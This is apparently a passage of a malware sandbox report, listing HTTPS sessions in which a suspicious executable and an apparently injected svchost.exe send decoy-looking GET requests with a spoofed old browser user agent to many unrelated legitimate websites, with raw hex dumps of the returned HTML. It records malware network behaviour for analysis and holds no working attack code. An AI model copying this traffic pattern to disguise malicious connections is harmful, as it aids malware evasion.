Q5xyYuTq7e/x8/X4+vz+AQMFCAoD5APb1TfJiwbBtwwniL6SI0qmHcXyxdD8p8aTCVc4RGL5ycnbLrpCZ0cCrsf9/kuQokL9ucHfwZlB2yDajbaeJyMMF43j1VHI+yqs28lDuJnbWhAXTLK2S7reQtaP83FiFPDdcPyoBcM3CoLu6fW/c8iRx0HY9kvLTnsPh8JZRGmqyifvhTfHqRPDfr+PhzSFOR38MyY6P5NnCuTx167Tgaq0L48BNYSHDdF

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.5	19868	83.223.113.46	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:32 UTC	808	OUT	GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: dataform.co.uk
2023-03-22 04:45:33 UTC	927	IN	HTTP/1.1 200 OK Cache-Control: must-revalidate, no-cache, max-age=0 Keep-Alive: timeout=2, max=98 Content-Length: 48940 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: Accept-Encoding Server: Apache Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with Access-Control-Allow-Origin: * X-Powered-By: PHP/7.0.29 X-UA-Compatible: IE=EmulateIE10 X-Frame-Options: SAMEORIGIN X-Mod-Pagespeed: 1.9.32.14-0 Strict-Transport-Security: max-age=10886400 X-Powered-By: ASP.NET Date: Wed, 22 Mar 2023 04:45:32 GMT Connection: close
2023-03-22 04:45:33 UTC	928	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c Data Ascii: <!DOCTYPE html>...[if !(IE 6) \| !(IE 7) \| !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
2023-03-22 04:45:33 UTC	931	IN	Data Raw: 2c 35 36 34 31 38 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 2c 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 31 38 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 73 28 5b 35 35 33 35 38 2c 35 36 37 36 30 2c 39 37 39 32 2c 36 35 30 33 39 5d 2c 5b 35 35 33 35 38 2c 35 36 37 36 30 2c 38 32 30 33 2c 39 37 39 32 2c 36 35 30 33 39 5d 29 7d 72 65 74 75 72 Data Ascii: ,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55358,56760,9792,65039],[55358,56760,8203,9792,65039])}retur
2023-03-22 04:45:33 UTC	939	IN	Data Raw: 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 32 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 20 62 65 67 69 6e 3d 27 30 27 20 6b 65 79 74 69 6d 65 73 3d 27 30 3b 2e 32 3b 2e 35 3b 31 27 20 6b 65 79 53 70 6c 69 6e 65 73 3d 27 30 2e 32 20 30 2e 32 20 30 2e 34 20 30 2e 38 3b Data Ascii: orm='translate(2)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repeatCount='indefinite' begin='0' keytimes='0;.2;.5;1' keySplines='0.2 0.2 0.4 0.8;
2023-03-22 04:45:33 UTC	947	IN	Data Raw: 6d 6f 72 65 20 6f 70 74 69 6f 6e 73 22 2c 22 70 65 72 6d 61 6c 69 6e 6b 73 22 3a 22 31 22 2c 22 72 65 63 61 70 74 63 68 61 5f 73 69 74 65 5f 6b 65 79 22 3a 22 22 2c 22 72 65 63 61 70 74 63 68 61 5f 76 65 72 73 69 6f 6e 22 3a 22 76 32 22 2c 22 72 65 70 6c 69 65 73 5f 74 6f 5f 6c 6f 61 64 22 3a 22 35 22 2c 22 72 65 70 6c 79 5f 6c 61 62 65 6c 22 3a 22 52 65 70 6c 79 22 2c 22 73 65 61 72 63 68 5f 70 6c 61 63 65 68 6f 6c 64 65 72 22 3a 22 53 65 61 72 63 68 20 6f 70 74 69 6f 6e 73 22 2c 22 73 75 62 6d 69 74 5f 74 69 63 6b 65 74 22 3a 22 53 75 62 6d 69 74 20 54 69 63 6b 65 74 22 2c 22 73 75 62 6d 69 74 5f 74 69 63 6b 65 74 5f 6c 6f 61 64 69 6e 67 22 3a 22 50 6c 65 61 73 65 20 57 61 69 74 2e 2e 2e 22 2c 22 74 79 70 65 5f 74 6f 5f 73 65 61 72 63 68 22 3a 22 54 79 Data Ascii: more options","permalinks":"1","recaptcha_site_key":"","recaptcha_version":"v2","replies_to_load":"5","reply_label":"Reply","search_placeholder":"Search options","submit_ticket":"Submit Ticket","submit_ticket_loading":"Please Wait...","type_to_search":"Ty
2023-03-22 04:45:33 UTC	955	IN	Data Raw: 6f 6e 20 35 2e 34 2e 38 20 2d 20 72 65 73 70 6f 6e 73 69 76 65 2c 20 4d 6f 62 69 6c 65 2d 46 72 69 65 6e 64 6c 79 20 53 6c 69 64 65 72 20 50 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 20 77 69 74 68 20 63 6f 6d 66 6f 72 74 61 62 6c 65 20 64 72 61 67 20 61 6e 64 20 64 72 6f 70 20 69 6e 74 65 72 66 61 63 65 2e 22 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 7b 76 61 72 20 6c 6f 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 22 29 3b 76 61 72 20 72 65 6d 6f 76 65 Data Ascii: on 5.4.8 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."/><script type="text/javascript">document.addEventListener("DOMContentLoaded",function(event){var load=document.getElementById("load");var remove
2023-03-22 04:45:33 UTC	963	IN	Data Raw: 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 3e 0a 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 70 61 67 65 5f 69 74 65 6d 20 70 61 67 65 2d 69 74 65 6d 2d 31 36 20 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 35 38 20 61 63 74 20 66 69 72 73 74 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d Data Ascii: in-nav" role="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-16 current_page_item menu-item-54058 act first"><a href='https://dataform.co.uk/' data-level='1'><span class="m
2023-03-22 04:45:33 UTC	980	IN	Data Raw: 63 74 69 6f 6e 20 73 74 61 72 74 63 6c 6f 63 6b 28 29 7b 73 74 6f 70 63 6c 6f 63 6b 28 29 3b 73 68 6f 77 74 69 6d 65 28 29 3b 7d 0a 76 61 72 20 74 69 6d 65 72 49 44 3d 6e 75 6c 6c 3b 76 61 72 20 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66 61 6c 73 65 3b 76 61 72 20 78 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 6e 6f 77 3d 78 2e 67 65 74 54 69 6d 65 28 29 3b 76 61 72 20 67 6d 74 3d 31 36 37 39 34 36 30 33 33 32 2a 31 30 30 30 3b 76 61 72 20 64 69 66 66 6d 73 3d 28 6e 6f 77 2d 67 6d 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3b 63 3d 63 2e 72 65 70 6c 61 63 65 28 2f Data Ascii: ction startclock(){stopclock();showtime();}var timerID=null;var timerRunning=false;var x=new Date();var now=x.getTime();var gmt=1679460332*1000;var diffms=(now-gmt);</script><script type="text/javascript">var c=document.body.className;c=c.replace(/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.5	19916	91.229.22.126	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:32 UTC	808	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: pleszew.policja.gov.pl
2023-03-22 04:45:32 UTC	808	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:46:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2023-03-22 04:45:32 UTC	809	IN	Data Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65 Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
2023-03-22 04:45:32 UTC	825	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
2023-03-22 04:45:32 UTC	841	IN	Data Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
2023-03-22 04:45:32 UTC	857	IN	Data Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.5	20031	188.114.96.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:32 UTC	809	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.se
2023-03-22 04:45:32 UTC	857	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:32 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Location: https://hyab.com Cache-Control: max-age=600 Expires: Wed, 22 Mar 2023 04:55:32 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JaAjO9dVFLsYxD40ZN8Zar6YHRYEtHQaNSed77%2B5M5XgSGcQs5C0nz7RWje8UHZegOvTcdq%2F1qy%2Fv5m4eT7M2lYl1qQjMMPK1%2BOGKkb9Ua%2FvknFhXWroVfOk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc9269e67903a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:32 UTC	858	IN	Data Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
2023-03-22 04:45:32 UTC	858	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	50232	75.2.95.235	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:28 UTC	62	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: ldh.la.gov
2023-03-22 04:44:28 UTC	62	IN	HTTP/1.1 406 Not Acceptable Date: Wed, 22 Mar 2023 04:44:28 GMT Content-Type: text/html Content-Length: 1346 Connection: close Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET
2023-03-22 04:44:28 UTC	63	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.5	20088	172.67.156.49	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:32 UTC	857	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: orlyhotel.com Cookie: django_language=en
2023-03-22 04:45:32 UTC	925	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 22 Mar 2023 04:45:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: max-age=0, no-store, no-cache, must-revalidate Expires: Wed, 22 Mar 2023 04:35:25 GMT Content-Language: en Last-Modified: Wed, 22 Mar 2023 04:35:25 GMT X-Frame-Options: SAMEORIGIN Vary: Accept-Language CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wFJDlqI1h4swEUhEDGR8Sb1vy1iAAwQ2QtBYQHvSaVPrRbHk802LYkRBIvHf4AibFpTTyP4wU%2FIEsM7c8dlg5icSb4iJIPkypxedcxtIvttwmcX%2BZrNOu44%2BLsg6Ftw4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc927b8ad9171-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:32 UTC	926	IN	Data Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a Data Ascii: 1b<h1>Server Error (500)</h1>
2023-03-22 04:45:32 UTC	926	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.5	20115	104.21.65.224	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:32 UTC	858	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.com Cookie: PHPSESSID=8dd73ce1a917b5d53ecdcb71ebb9bc82
2023-03-22 04:45:33 UTC	971	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding,User-Agent Location: https://hyabmagneter.se CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wFkYiq%2FTzoe1c9fnU3If2iSMOJPj3W8KteqV8tcYf2CivD1aR49QpCqxWtx2T4mQ7FjIeJBzwzy9EuNEnOzCkJawjjwvC6PLfBbY6egkdF2Yev%2B9f7PtNAZvAQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc9283b199150-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:33 UTC	971	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.5	20092	35.214.171.193	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:32 UTC	858	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: flamingorecordings.com
2023-03-22 04:45:32 UTC	859	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding SG-F-Cache: HIT X-Httpd-Modphp: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache: HIT
2023-03-22 04:45:32 UTC	859	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
